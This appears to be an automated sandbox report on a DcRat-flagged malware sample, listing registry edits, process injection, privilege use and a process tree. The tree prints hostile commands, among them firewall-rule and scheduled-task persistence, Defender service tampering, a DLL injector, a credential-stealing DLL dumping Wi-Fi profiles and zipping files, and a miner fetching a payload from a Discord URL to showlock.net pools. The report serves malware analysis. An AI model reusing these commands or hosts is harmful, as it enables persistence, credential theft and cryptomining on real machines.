Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3496	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4752	6958ACC382E71103A0B83D20BBBB37D2.exe
4752	6958ACC382E71103A0B83D20BBBB37D2.exe
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found
3496	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3496	Process not Found
4668	taskmgr.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4752	6958ACC382E71103A0B83D20BBBB37D2.exe
5016	viewer.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeDebugPrivilege	4668	taskmgr.exe
Token: SeSystemProfilePrivilege	4668	taskmgr.exe
Token: SeCreateGlobalPrivilege	4668	taskmgr.exe
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeDebugPrivilege	892	powershell.exe
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeDebugPrivilege	3460	FF93.exe
Token: SeImpersonatePrivilege	3460	FF93.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeDebugPrivilege	2120	ladas.exe
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeDebugPrivilege	4368	1706.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	3820	msedge.exe
Token: SeDebugPrivilege	1600	msedge.exe
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found
Token: SeShutdownPrivilege	3496	Process not Found
Token: SeCreatePagefilePrivilege	3496	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
3496	Process not Found
3496	Process not Found
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
3536	13E8.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe
4668	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3588	iexplore.exe
4076	dotu.exe
3496	Process not Found
3496	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3496	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3496 wrote to memory of 4668	3496	Process not Found	92
PID 3496 wrote to memory of 4668	3496	Process not Found	92
PID 3496 wrote to memory of 4268	3496	Process not Found	93
PID 3496 wrote to memory of 4268	3496	Process not Found	93
PID 4268 wrote to memory of 2240	4268	cmd.exe	95
PID 4268 wrote to memory of 2240	4268	cmd.exe	95
PID 3496 wrote to memory of 2008	3496	Process not Found	98
PID 3496 wrote to memory of 2008	3496	Process not Found	98
PID 3496 wrote to memory of 2008	3496	Process not Found	98
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 2008 wrote to memory of 3992	2008	B864.exe	99
PID 3992 wrote to memory of 3712	3992	B864.exe	100
PID 3992 wrote to memory of 3712	3992	B864.exe	100
PID 3992 wrote to memory of 3712	3992	B864.exe	100
PID 3992 wrote to memory of 3724	3992	B864.exe	101
PID 3992 wrote to memory of 3724	3992	B864.exe	101
PID 3992 wrote to memory of 3724	3992	B864.exe	101
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3724 wrote to memory of 3328	3724	B864.exe	103
PID 3496 wrote to memory of 5036	3496	Process not Found	107
PID 3496 wrote to memory of 5036	3496	Process not Found	107
PID 3496 wrote to memory of 5036	3496	Process not Found	107
PID 3496 wrote to memory of 3516	3496	Process not Found	108
PID 3496 wrote to memory of 3516	3496	Process not Found	108
PID 3496 wrote to memory of 3516	3496	Process not Found	108
PID 3496 wrote to memory of 4752	3496	Process not Found	111
PID 3496 wrote to memory of 4752	3496	Process not Found	111
PID 4752 wrote to memory of 116	4752	cmd.exe	110
PID 4752 wrote to memory of 116	4752	cmd.exe	110
PID 3496 wrote to memory of 3460	3496	Process not Found	112
PID 3496 wrote to memory of 3460	3496	Process not Found	112
PID 3496 wrote to memory of 3460	3496	Process not Found	112
PID 3460 wrote to memory of 892	3460	FF93.exe	114
PID 3460 wrote to memory of 892	3460	FF93.exe	114
PID 3460 wrote to memory of 892	3460	FF93.exe	114
PID 3496 wrote to memory of 4588	3496	Process not Found	145
PID 3496 wrote to memory of 4588	3496	Process not Found	145
PID 3496 wrote to memory of 4588	3496	Process not Found	145
PID 4520 wrote to memory of 2068	4520	FF93.exe	119
PID 4520 wrote to memory of 2068	4520	FF93.exe	119
PID 4520 wrote to memory of 2068	4520	FF93.exe	119
PID 3496 wrote to memory of 3536	3496	Process not Found	121
PID 3496 wrote to memory of 3536	3496	Process not Found	121
PID 3496 wrote to memory of 3536	3496	Process not Found	121
PID 3496 wrote to memory of 4368	3496	Process not Found	122
PID 3496 wrote to memory of 4368	3496	Process not Found	122
PID 4520 wrote to memory of 4448	4520	FF93.exe	123
PID 4520 wrote to memory of 4448	4520	FF93.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6958ACC382E71103A0B83D20BBBB37D2.exe
"C:\Users\Admin\AppData\Local\Temp\6958ACC382E71103A0B83D20BBBB37D2.exe"
1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4752
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:116

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\94BE.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4268
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:2240

C:\Users\Admin\AppData\Local\Temp\B864.exe
C:\Users\Admin\AppData\Local\Temp\B864.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Users\Admin\AppData\Local\Temp\B864.exe
  C:\Users\Admin\AppData\Local\Temp\B864.exe
  2⤵
  - DcRat
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\19ab23fa-5b88-4e65-8190-eb3aaefe7342" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:3712
- - C:\Users\Admin\AppData\Local\Temp\B864.exe
    "C:\Users\Admin\AppData\Local\Temp\B864.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Users\Admin\AppData\Local\Temp\B864.exe
      "C:\Users\Admin\AppData\Local\Temp\B864.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      PID:3328
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 568
        5⤵
        Program crash
        
        PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3328 -ip 3328
1⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\CCB8.exe
C:\Users\Admin\AppData\Local\Temp\CCB8.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5036

C:\Users\Admin\AppData\Local\Temp\EDED.exe
C:\Users\Admin\AppData\Local\Temp\EDED.exe
1⤵
- Executes dropped EXE
PID:3516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F32E.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4752

C:\Users\Admin\AppData\Local\Temp\FF93.exe
C:\Users\Admin\AppData\Local\Temp\FF93.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nologo -noprofile
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Users\Admin\AppData\Local\Temp\FF93.exe
  "C:\Users\Admin\AppData\Local\Temp\FF93.exe"
  2⤵
  - Executes dropped EXE
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:4448
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    PID:5508
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:7680
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:5316
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:5556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:7136
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      PID:6460
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:7228
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      PID:6104
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:3488
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        
        PID:2760
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:5480
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:8
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
      4⤵
      PID:9904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5528
  - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      4⤵
      PID:10380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:10444

C:\Users\Admin\AppData\Local\Temp\B4C.exe
C:\Users\Admin\AppData\Local\Temp\B4C.exe
1⤵
PID:4588
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  2⤵
  PID:4884

C:\Users\Admin\AppData\Local\Temp\13E8.exe
C:\Users\Admin\AppData\Local\Temp\13E8.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:3536

C:\Users\Admin\AppData\Local\Temp\1706.exe
C:\Users\Admin\AppData\Local\Temp\1706.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3056
- C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe
  "C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe"
  2⤵
  - Executes dropped EXE
  PID:5052
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 800
    3⤵
    - Program crash
    PID:1876
- C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe
  "C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe"
  2⤵
  PID:3096
- - C:\ProgramData\viewer\viewer.exe
    "C:\ProgramData\viewer\viewer.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID:5016
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  PID:976
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    PID:2272
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\392040655205_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4688
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4592
- C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
  "C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:4588
- - C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
    "C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
    3⤵
    PID:1600
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000564041\do.ps1"
  2⤵
  PID:3820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3⤵
    PID:3000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6aef9758,0x7fff6aef9768,0x7fff6aef9778
      4⤵
      PID:5200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
    3⤵
    PID:5248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6d8c46f8,0x7fff6d8c4708,0x7fff6d8c4718
      4⤵
      PID:5928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,18231757329534451668,9096904176516851307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
      4⤵
      PID:4788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,18231757329534451668,9096904176516851307,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
      4⤵
      PID:3840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,18231757329534451668,9096904176516851307,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
      4⤵
      PID:1876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,18231757329534451668,9096904176516851307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
      4⤵
      PID:1464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,18231757329534451668,9096904176516851307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
      4⤵
      PID:5396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3⤵
    PID:5568
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:5832
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.0.938358488\173674112" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0670b1d-0bde-493f-8167-cd32dc948316} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 1876 2603f4d3c58 gpu
        5⤵
        
        PID:6232
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login
    3⤵
